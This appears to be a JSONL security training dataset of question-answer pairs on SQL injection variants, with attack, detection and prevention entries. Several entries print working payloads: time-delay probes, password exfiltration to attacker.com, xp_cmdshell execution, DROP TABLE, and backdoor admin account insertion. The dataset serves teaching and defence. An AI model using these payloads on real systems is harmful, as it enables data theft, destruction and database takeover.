+{"id": "trtp-7e2d8e0a6ac8", "instruction": "Why is Time-Based Blind SQL Injection important for database security?", "output": "Time-based injection is the most reliable blind technique, working even when response content is identical. Network latency affects accuracy, but it defeats all response-based defenses.\n\nCommon attack vectors include:\n- MySQL: IF(condition,SLEEP(5),0)\n- MSSQL: WAITFOR DELAY '0:0:5'\n- PostgreSQL: pg_sleep(5)\n- BENCHMARK: BENCHMARK(10000000,SHA1('test'))", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098321Z", "updated_at": "2025-12-17T19:35:42.098321Z"}
+{"id": "trtp-d030ac35061a", "instruction": "What attacks exploit Time-Based Blind SQL Injection?", "output": "Attack techniques involving Time-Based Blind SQL Injection:\n\n- MySQL: IF(condition,SLEEP(5),0)\n- MSSQL: WAITFOR DELAY '0:0:5'\n- PostgreSQL: pg_sleep(5)\n- BENCHMARK: BENCHMARK(10000000,SHA1('test'))\n\nDefenders can detect these attacks by:\n- SLEEP/WAITFOR/pg_sleep in parameters\n- Abnormally long response times\n- BENCHMARK function calls", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098336Z", "updated_at": "2025-12-17T19:35:42.098336Z"}
+{"id": "trtp-347c51544e83", "instruction": "What log entries indicate Time-Based Blind SQL Injection attacks?", "output": "Methods for detecting Time-Based Blind SQL Injection attacks or anomalies:\n\n- SLEEP/WAITFOR/pg_sleep in parameters\n- Abnormally long response times\n- BENCHMARK function calls\n- Response time correlation with specific inputs", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098348Z", "updated_at": "2025-12-17T19:35:42.098348Z"}
+{"id": "trtp-53f49e0a0bc9", "instruction": "How can organizations protect against Time-Based Blind SQL Injection?", "output": "Security controls and preventive measures for Time-Based Blind SQL Injection:\n\n- Parameterized queries\n- Query timeout limits\n- Disable delay functions for app accounts\n- Request timeout at application level\n\nTime-based injection is the most reliable blind technique, working even when response content is identical. Network latency affects accuracy, but it defeats all response-based defenses.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098361Z", "updated_at": "2025-12-17T19:35:42.098361Z"}
+{"id": "trtp-3d028687d9ea", "instruction": "What does Time-Based Blind SQL Injection look like in SQL?", "output": "Example of Time-Based Blind SQL Injection:\n\n```sql\n-- MySQL: ' AND IF(1=1,SLEEP(5),0)--\n-- MSSQL: '; WAITFOR DELAY '0:0:5'--\n-- PostgreSQL: '; SELECT pg_sleep(5)--\n-- Conditional: ' AND IF(SUBSTRING(password,1,1)='a',SLEEP(5),0)--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098372Z", "updated_at": "2025-12-17T19:35:42.098372Z"}
+{"id": "trtp-6ebc8a133f0d", "instruction": "Explain Second-Order SQL Injection from a security perspective.", "output": "Second-order injection stores malicious input that executes later when retrieved and used in subsequent queries. The payload doesn't execute on input but triggers when stored data is used unsafely in queries.\n\nSecurity Relevance: Second-order injection bypasses input validation because the payload appears harmless at entry. Applications trusting database-stored data are vulnerable. The execution point differs from injection point, complicating detection.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100463Z", "updated_at": "2025-12-17T19:35:42.100463Z"}
+{"id": "trtp-5818da4ea678", "instruction": "Describe the technical aspects of Second-Order SQL Injection.", "output": "Second-Order SQL Injection consists of the following key components:\n\n- Data storage without sanitization\n- Later retrieval and query use\n- Trusted internal data assumption\n- Profile/preference fields as storage\n- Batch processing vulnerabilities", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100492Z", "updated_at": "2025-12-17T19:35:42.100492Z"}
+{"id": "trtp-25cf58e185fa", "instruction": "From a security perspective, why should defenders understand Second-Order SQL Injection?", "output": "Second-order injection bypasses input validation because the payload appears harmless at entry. Applications trusting database-stored data are vulnerable. The execution point differs from injection point, complicating detection.\n\nCommon attack vectors include:\n- Username injection triggering in password reset\n- Profile field injection in admin reports\n- Comment injection executing in moderation queue\n- Import data injection", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100507Z", "updated_at": "2025-12-17T19:35:42.100507Z"}
+{"id": "trtp-bf3069b86dfb", "instruction": "What attacks exploit Second-Order SQL Injection?", "output": "Attack techniques involving Second-Order SQL Injection:\n\n- Username injection triggering in password reset\n- Profile field injection in admin reports\n- Comment injection executing in moderation queue\n- Import data injection\n\nDefenders can detect these attacks by:\n- SQL patterns in stored user data\n- Query tracing from storage to execution\n- Audit trail correlation", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100521Z", "updated_at": "2025-12-17T19:35:42.100521Z"}
+{"id": "trtp-a8682408a78a", "instruction": "How do you detect exploitation of Second-Order SQL Injection?", "output": "Methods for detecting Second-Order SQL Injection attacks or anomalies:\n\n- SQL patterns in stored user data\n- Query tracing from storage to execution\n- Audit trail correlation\n- Stored procedure parameter analysis", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100532Z", "updated_at": "2025-12-17T19:35:42.100532Z"}
+{"id": "trtp-3c3332f6c6d1", "instruction": "How do you defend against Second-Order SQL Injection attacks?", "output": "Security controls and preventive measures for Second-Order SQL Injection:\n\n- Parameterize ALL queries including internal data\n- Never trust data just because it's from database\n- Validate at both input and retrieval\n- Defense in depth for all data sources\n\nSecond-order injection bypasses input validation because the payload appears harmless at entry. Applications trusting database-stored data are vulnerable. The execution point differs from injection point, complicating detection.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100551Z", "updated_at": "2025-12-17T19:35:42.100551Z"}
+{"id": "trtp-db815d016073", "instruction": "What is the syntax for Second-Order SQL Injection?", "output": "Example of Second-Order SQL Injection:\n\n```sql\n-- Step 1: Register username as: admin'--\n-- Step 2: Application stores it\n-- Step 3: Password reset query uses stored username unsafely\n-- Result: Query becomes: UPDATE users SET password='...' WHERE username='admin'--'\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-second-order-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.100433Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.100562Z", "updated_at": "2025-12-17T19:35:42.100562Z"}
+{"id": "trtp-71b7059bde55", "instruction": "Explain Out-of-Band SQL Injection from a security perspective.", "output": "Out-of-band injection exfiltrates data through alternative channels like DNS or HTTP requests initiated by the database server. When direct and blind techniques fail, OOB uses database features to make external connections.\n\nSecurity Relevance: OOB injection works when other techniques are blocked. It requires the database server to have external network access. A single query can exfiltrate significant data through DNS subdomains.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102362Z", "updated_at": "2025-12-17T19:35:42.102362Z"}
+{"id": "trtp-034d45131e10", "instruction": "What are the main parts of Out-of-Band SQL Injection that security teams should understand?", "output": "Out-of-Band SQL Injection consists of the following key components:\n\n- DNS exfiltration via LOAD_FILE\n- HTTP requests (UTL_HTTP, xp_dirtree)\n- SMB/UNC path requests\n- Database email functionality\n- File write to web directories", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102382Z", "updated_at": "2025-12-17T19:35:42.102382Z"}
+{"id": "trtp-e5b1d18855cd", "instruction": "From a security perspective, why should defenders understand Out-of-Band SQL Injection?", "output": "OOB injection works when other techniques are blocked. It requires the database server to have external network access. A single query can exfiltrate significant data through DNS subdomains.\n\nCommon attack vectors include:\n- DNS exfiltration: data encoded in subdomain\n- HTTP callback with data in URL\n- SMB authentication capture\n- File write for webshell", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102406Z", "updated_at": "2025-12-17T19:35:42.102406Z"}
+{"id": "trtp-e00ba1f852d4", "instruction": "What are common attack techniques involving Out-of-Band SQL Injection?", "output": "Attack techniques involving Out-of-Band SQL Injection:\n\n- DNS exfiltration: data encoded in subdomain\n- HTTP callback with data in URL\n- SMB authentication capture\n- File write for webshell\n\nDefenders can detect these attacks by:\n- Outbound DNS from database server\n- HTTP connections initiated by database\n- SMB traffic from database tier", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102421Z", "updated_at": "2025-12-17T19:35:42.102421Z"}
+{"id": "trtp-cb0ab5bae2c8", "instruction": "What log entries indicate Out-of-Band SQL Injection attacks?", "output": "Methods for detecting Out-of-Band SQL Injection attacks or anomalies:\n\n- Outbound DNS from database server\n- HTTP connections initiated by database\n- SMB traffic from database tier\n- Unusual file operations", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102433Z", "updated_at": "2025-12-17T19:35:42.102433Z"}
+{"id": "trtp-a163d691f46c", "instruction": "How can organizations protect against Out-of-Band SQL Injection?", "output": "Security controls and preventive measures for Out-of-Band SQL Injection:\n\n- Block database server outbound connections\n- Disable UTL_HTTP, xp_cmdshell, xp_dirtree\n- Network segmentation\n- Monitor database egress traffic\n\nOOB injection works when other techniques are blocked. It requires the database server to have external network access. A single query can exfiltrate significant data through DNS subdomains.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102445Z", "updated_at": "2025-12-17T19:35:42.102445Z"}
+{"id": "trtp-94ab81f68cf3", "instruction": "What does Out-of-Band SQL Injection look like in SQL?", "output": "Example of Out-of-Band SQL Injection:\n\n```sql\n-- MySQL: LOAD_FILE(CONCAT('\\\\\\\\',password,'.attacker.com\\\\a'))\n-- MSSQL: exec master..xp_dirtree '\\\\\\\\data.attacker.com\\\\a'\n-- Oracle: SELECT UTL_HTTP.REQUEST('http://attacker.com/'||password) FROM users\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-out-of-band-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.102334Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.102455Z", "updated_at": "2025-12-17T19:35:42.102455Z"}
+{"id": "trtp-0d83492de2e7", "instruction": "What do security professionals need to know about Stacked Queries Injection?", "output": "Stacked queries execute multiple SQL statements separated by semicolons. This enables attackers to execute arbitrary statements including DDL commands, beyond just modifying the original query.\n\nSecurity Relevance: Stacked queries enable complete database control: creating backdoor accounts, dropping tables, modifying permissions, or executing system commands. Not all databases/drivers support this, but when available, it's devastating.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104234Z", "updated_at": "2025-12-17T19:35:42.104234Z"}
+{"id": "trtp-58124f627b7d", "instruction": "Describe the technical aspects of Stacked Queries Injection.", "output": "Stacked Queries Injection consists of the following key components:\n\n- Statement termination (;)\n- Multiple statement execution\n- Database/driver support requirements\n- DDL command injection\n- Transaction manipulation", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104255Z", "updated_at": "2025-12-17T19:35:42.104255Z"}
+{"id": "trtp-5b68132184ac", "instruction": "How can Stacked Queries Injection lead to database security incidents?", "output": "Stacked queries enable complete database control: creating backdoor accounts, dropping tables, modifying permissions, or executing system commands. Not all databases/drivers support this, but when available, it's devastating.\n\nCommon attack vectors include:\n- Account creation: ; INSERT INTO users VALUES('hacker','password','admin')\n- Table destruction: ; DROP TABLE sensitive_data\n- Privilege escalation: ; GRANT ALL PRIVILEGES TO attacker\n- System command: ; EXEC xp_cmdshell 'command'", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104269Z", "updated_at": "2025-12-17T19:35:42.104269Z"}
+{"id": "trtp-1228415d735c", "instruction": "What threats are associated with Stacked Queries Injection?", "output": "Attack techniques involving Stacked Queries Injection:\n\n- Account creation: ; INSERT INTO users VALUES('hacker','password','admin')\n- Table destruction: ; DROP TABLE sensitive_data\n- Privilege escalation: ; GRANT ALL PRIVILEGES TO attacker\n- System command: ; EXEC xp_cmdshell 'command'\n\nDefenders can detect these attacks by:\n- Semicolons in user input\n- Multiple statement execution in logs\n- DDL statements from application accounts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104284Z", "updated_at": "2025-12-17T19:35:42.104284Z"}
+{"id": "trtp-ae0fbbf57a5f", "instruction": "How can security teams detect attacks related to Stacked Queries Injection?", "output": "Methods for detecting Stacked Queries Injection attacks or anomalies:\n\n- Semicolons in user input\n- Multiple statement execution in logs\n- DDL statements from application accounts\n- Unusual GRANT/REVOKE operations", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104296Z", "updated_at": "2025-12-17T19:35:42.104296Z"}
+{"id": "trtp-e86bc5185d80", "instruction": "How do you defend against Stacked Queries Injection attacks?", "output": "Security controls and preventive measures for Stacked Queries Injection:\n\n- Parameterized queries\n- Disable multiple statement execution\n- Restrict DDL permissions\n- Application accounts with minimal privileges\n\nStacked queries enable complete database control: creating backdoor accounts, dropping tables, modifying permissions, or executing system commands. Not all databases/drivers support this, but when available, it's devastating.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104318Z", "updated_at": "2025-12-17T19:35:42.104318Z"}
+{"id": "trtp-ad91ca7a5cf3", "instruction": "What does Stacked Queries Injection look like in SQL?", "output": "Example of Stacked Queries Injection:\n\n```sql\n-- MSSQL (supports stacked): '; EXEC xp_cmdshell 'whoami'--\n-- MySQL (connection-dependent): '; DROP TABLE users;--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-stacked-queries-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.104206Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.104328Z", "updated_at": "2025-12-17T19:35:42.104328Z"}
+{"id": "trtp-4d86f3adbd56", "instruction": "How does SQL Injection in INSERT/UPDATE Contexts work and what are its security implications?", "output": "SQL injection in INSERT and UPDATE statements has different exploitation patterns than SELECT injection. These contexts modify data, enabling privilege escalation, data corruption, and persistence mechanisms.\n\nSecurity Relevance: INSERT/UPDATE injection directly modifies database state. Attackers can escalate privileges by injecting admin role values, create backdoor accounts, or corrupt critical data.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106422Z", "updated_at": "2025-12-17T19:35:42.106422Z"}
+{"id": "trtp-e5080318a162", "instruction": "Describe the technical aspects of SQL Injection in INSERT/UPDATE Contexts.", "output": "SQL Injection in INSERT/UPDATE Contexts consists of the following key components:\n\n- VALUES clause injection\n- SET clause injection\n- Additional column injection\n- Subquery injection in values\n- ON DUPLICATE KEY exploitation", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106442Z", "updated_at": "2025-12-17T19:35:42.106442Z"}
+{"id": "trtp-ed29aff2cd80", "instruction": "What security risks are associated with SQL Injection in INSERT/UPDATE Contexts?", "output": "INSERT/UPDATE injection directly modifies database state. Attackers can escalate privileges by injecting admin role values, create backdoor accounts, or corrupt critical data.\n\nCommon attack vectors include:\n- Additional row injection in INSERT\n- Extra column modification in UPDATE\n- Subquery data extraction in VALUES\n- Role/privilege field manipulation", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106457Z", "updated_at": "2025-12-17T19:35:42.106457Z"}
+{"id": "trtp-99fd47611480", "instruction": "How do attackers abuse SQL Injection in INSERT/UPDATE Contexts?", "output": "Attack techniques involving SQL Injection in INSERT/UPDATE Contexts:\n\n- Additional row injection in INSERT\n- Extra column modification in UPDATE\n- Subquery data extraction in VALUES\n- Role/privilege field manipulation\n\nDefenders can detect these attacks by:\n- Unexpected row counts in INSERT/UPDATE\n- Privilege field modifications\n- Subqueries in VALUE clauses", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106470Z", "updated_at": "2025-12-17T19:35:42.106470Z"}
+{"id": "trtp-381d965d706a", "instruction": "What indicators reveal malicious activity involving SQL Injection in INSERT/UPDATE Contexts?", "output": "Methods for detecting SQL Injection in INSERT/UPDATE Contexts attacks or anomalies:\n\n- Unexpected row counts in INSERT/UPDATE\n- Privilege field modifications\n- Subqueries in VALUE clauses\n- Multi-row INSERT patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106506Z", "updated_at": "2025-12-17T19:35:42.106506Z"}
+{"id": "trtp-2f24a61d78e7", "instruction": "What security controls mitigate SQL Injection in INSERT/UPDATE Contexts risks?", "output": "Security controls and preventive measures for SQL Injection in INSERT/UPDATE Contexts:\n\n- Parameterized queries for INSERT/UPDATE\n- Explicit column lists in INSERT\n- Row-level security\n- Trigger-based validation\n\nINSERT/UPDATE injection directly modifies database state. Attackers can escalate privileges by injecting admin role values, create backdoor accounts, or corrupt critical data.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106525Z", "updated_at": "2025-12-17T19:35:42.106525Z"}
+{"id": "trtp-b3d448925c99", "instruction": "Show an example of SQL Injection in INSERT/UPDATE Contexts.", "output": "Example of SQL Injection in INSERT/UPDATE Contexts:\n\n```sql\n-- INSERT injection: INSERT INTO users VALUES('user','pass',''),('admin','hacked','admin')\n-- UPDATE injection: UPDATE users SET email='a@b.c',role='admin' WHERE id=1\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-insert-update-contexts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.106392Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.106537Z", "updated_at": "2025-12-17T19:35:42.106537Z"}
+{"id": "trtp-63af65603f57", "instruction": "Describe SQL Injection in ORDER BY/GROUP BY and its role in database security.", "output": "ORDER BY and GROUP BY clauses don't accept parameterized values in most databases, making them common injection vectors. Attackers use these contexts for error-based or blind extraction when other vectors are patched.\n\nSecurity Relevance: ORDER BY injection is often overlooked because developers assume sorting is safe. Since parameterization doesn't work here, allowlisting column names is required. Conditional CASE statements enable blind extraction.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108901Z", "updated_at": "2025-12-17T19:35:42.108901Z"}
+{"id": "trtp-49820078cb05", "instruction": "What elements make up SQL Injection in ORDER BY/GROUP BY?", "output": "SQL Injection in ORDER BY/GROUP BY consists of the following key components:\n\n- Column specification in ORDER BY\n- Expression-based ordering\n- CASE statements for conditional ordering\n- Error-based extraction through ORDER BY\n- GROUP BY injection patterns", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108921Z", "updated_at": "2025-12-17T19:35:42.108921Z"}
+{"id": "trtp-7aece8617a6a", "instruction": "What security risks are associated with SQL Injection in ORDER BY/GROUP BY?", "output": "ORDER BY injection is often overlooked because developers assume sorting is safe. Since parameterization doesn't work here, allowlisting column names is required. Conditional CASE statements enable blind extraction.\n\nCommon attack vectors include:\n- Column count enumeration via ORDER BY\n- CASE-based conditional extraction\n- Error-based extraction through invalid column\n- Schema discovery via column names", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108936Z", "updated_at": "2025-12-17T19:35:42.108936Z"}
